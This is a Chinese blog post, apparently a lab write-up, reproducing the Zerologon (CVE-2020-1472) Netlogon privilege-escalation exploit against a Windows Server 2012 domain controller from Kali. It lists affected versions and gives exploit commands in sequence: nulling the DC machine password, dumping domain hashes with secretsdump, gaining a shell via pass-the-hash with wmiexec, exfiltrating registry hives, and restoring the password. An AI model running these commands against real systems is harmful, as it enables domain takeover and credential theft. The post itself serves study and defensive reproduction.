CVE 2020-1472 Netlogon 特权提升漏洞

该博客详细介绍了CVE 2020-1472 Netlogon特权提升漏洞的复现过程,包括复现环境、影响版本、复现步骤如漏洞验证、利用方法(下载攻击exp、置空密码、获取hash等)以及修复建议。内容涉及Windows 2012 Server DC和Kali攻击机的配置,使用了Impacket工具进行漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.复现环境

DC:
os:windows 2012 server
ip:192.168.236.132

攻击机:
os:kali
ip:192.168.236.130

2.影响版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控环境搭建参考文章

4.复现过程

4.1 漏洞验证

POC链接

在这里插入图片描述
在这里插入图片描述

4.2 漏洞利用

安装最新的Impacket,否则会报错
在这里插入图片描述

4.2.1 下载攻击exp

EXP下载
在这里插入图片描述

4.2.2 置空密码
python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

在这里插入图片描述

4.2.3 获取hash

进入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

在这里插入图片描述

4.2.4 获取shell
python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

在这里插入图片描述

4.2.5 获取原hash
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

在这里插入图片描述

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

4.2.7 恢复hash

恢复链接
也可以直接
git clone https://github.com/risksense/zerologon

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

在这里插入图片描述

4.2.8 验证是否恢复

使用获取hash的命令来验证是否恢复

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

在这里插入图片描述

5.修复建议

修复建议

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值